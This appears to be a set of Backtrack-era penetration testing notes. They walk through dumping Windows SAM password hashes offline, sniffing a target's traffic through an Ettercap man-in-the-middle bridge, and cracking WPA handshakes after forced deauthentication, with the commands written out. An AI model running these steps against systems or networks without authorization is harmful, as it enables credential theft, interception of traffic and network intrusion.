Basic Windows passwords are stored in the SAM database, located by default at:
C:\Windows\System32\config\
Normally, there are protections in place that mean you can't access this file while the system is running. But you CAN access it while the system is offline via:
Caveat: If you cannot boot from live CD, you can't change the boot order, or the system is using Windows 8 with secure boot enabled, you will need to resort to mounting the system drive in another machine.
Once you have a copy of this folder, you can work with it offline, using the linux programs bkhive anc samdump2. Backtrack has these already installed for you, so use Backtrack, or obtain linux binary for bkhive & samdump2 on your linux distro of choice.
run these two commands:
bhkive ./config/SYSTEM keyout
samdump2 ./config/SAM keyout
(where config is the whole config folder from above).
samdump2 will output a list of any hashes present. These will be for the local user accounts on the computer, NOT domain accounts.
You can take this output, and dump it into your cracking tool of choice.
Your tool of choice is oclhashcat+.
Ettercap has been around for ages. It's currently on version 0.7.4.1, is available at: http://ettercap.sourceforge.net, and is included in Backtrack. For those of you who have no idea what Ettercap is, or what a packet sniffing program is, just think wiretapping. There's a lot more to it than just putting a tape recorder inside an analog phone, but the general idea is close.
In their own words:
Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
There are a ton of websites out there which purport to give tutorials on how to use Ettercap. Go ahead and find them, and read them. Or better yet, run:
# ettercap -h# man ettercap# info ettercapbecause basically, most of the sites I could find are just a regurgitation of Ettercap's own manual.
Be very careful when learning about, and using Ettercap. Even if you do it right, you can screw up the performance on a large network. If you do it wrong, you can DOS the whole subnet, and even adjacent subnets on other switches.
Ettercap is capable of operating in bridged mode, which is almost invisible. The monitoring is physically in between A and B, and all traffic passes through the bridge freely, meaning no ARP poisoning or other active attack is required.
The command to run Ettercap in bridged mode is quite simple:
# ettercap -Tq -i eth0 -B eth1However, when running this, I was getting an error 99, cannot assign address, about IP addresses not being assigned. I came across an article with the answer to this problem. In addition, it also suggested making your own bridge, and then running Ettercap on the bridge you just made instead of relying on Ettercap's bridge mode code.
# brctl addbr mitm-bridge# brctl addif mitm-bridge eth0# brctl addif mitm-bridge eth1# ifconfig eth0 0.0.0.0 up# ifconfig eth1 0.0.0.0 up# ifconfig mitm-bridge <GATEWAYIP> upTurn on IP forwarding:# echo 1 > /proc/sys/net/ipv4/ip_forwardStart sniffing:# ettercap -Tq -i mitm-bridgeNow unplug the nic of the Target, and move the cable to eth0 of the Monitor machine. Then connect eth1 of the Monitor to the nic of the Target. The Target machine should have no idea what just happened, apart from a brief network disconnection. The Monitor machine should now be able to pick up all traffic to and from the Target machine.
Quick and dirty guide to cracking WPA wireless networks. Find more details, instructions and information at:
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Get live-cd or live-usb of Backtrack 5 here. You have a choice of Gnome or Kde, 32 or 64 bit.
Boot from the live-cd, which will automatically login as root. Type "startx" to load the gui. Open a terminal, from the applications menu.
The simplest method, but not necessarily the fastest, uses the aircrack-ng program suite.
Identify your wireless card. Type in "ifconfig" in the terminal, and read the output. Your wireless card will probably be either wlan0 or ath0. For the rest of this guide, we will assume wlan0.
Put your wireless card into monitor mode.
# ifconfig wlan0 down
# iwconfig wlan0 mode monitor
# airodump-ng wlan0
If all goes well, you should see airodump start listing visible wireless networks, and displaying information about them. If you get an error, check google for assistance.
Press "ctrl+c" to close airodump once you see the name of the wireless network you are trying to crack. Run it again, with these changes to the command.
# airodump-ng wlan0 -c <wireless channel> -b <mac address of wireless AP> -w capture.cap
At this point, you will only be capturing packets related to the network in question. Wait until a station connects to the wireless network, and you capture the 4-way handshake. When this happens, airodump will display a message on the top line.
You can force any active stations to disconnect, at which point they will probably automatically reconnect. When they do, you can catch the handshake. To do this, you will use option #0 of aireplay. In another tab, run:
# aireplay-ng -0 60 wlan0 -b <mac address of wireless AP>
If your laptop's signal is strong enough, this will disconnect the station, forcing it to reconnect, and allowing you to capture the handshake. Go back to the first tab, and check on airodump's progress, where you should see the note that a handshake has been captured. If not, try the aireplay command again a few times. If you still don't see a handshake, try getting closer to the access point, a bigger wireless antenne, and double check that there is an active station connected to the wireless network.
Okay, so you've capture a 4way handshake. Now you can pass this to aircrack, which will perform a dictionary attack on the handshake. Depending on the size of the dictionary, this can take a few hours to run through the dictionary.
# aircrack-ng -w <password list> capture.cap
Backtrack has a decent password list at: /pentest/passwords/wordlists/darkc0de.lst
OpenCL is ATI's gpu accelleration software kit. Programs that utilise it's features are able to offload workloads from the cpu to the gpu. Since the gpu is generally orders of magnitude faster than the cpu, this results in the workloads being completed faster.
This is most noticeable for programs which perform repetitive number crunching. This technology can turn an aging pc into a very capable password cracking box, with some very cool, very free software.
To start with, your requirements are a pc with an ATI graphics card. (If your graphics card is NVidia, you can use CUDA instead: here). You will also need a copy of Backtrack 5, installed on a hard drive, able to boot natively. You might be able to get away with installing Backtrack to a removable USB drive if you're a Windows user, just make sure you unplug your internal Windows drive first, so that you don't destroy your bootloader by accident.
From there, these simple steps are outlined, in order to install the neccessary drivers and software which unlock the full computing potential of the graphics card.
http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL (thanks g0tmi1k)
At this point, you are free to use the OCL enabled software built into Backtrack, such as OCLHashcat. The guide also shows you how to download pyrit, which is a gpu enabled, distributed computing capable, very slick WPA hash bruteforcer.
Wireless is ubiquitous. That means it's almost everywhere in the developed nations. Thankfully, most people have been educated about the dangers of using WEP encryption on their wireless networks. WEP encryption has a number of weaknesses, which are well known. The result, is that a mildly interested person can look up steps and guides on how to crack a WEP password, and be able to understand and perform them.
This article demonstrates somebody can break a WEP password in under 30 minutes.
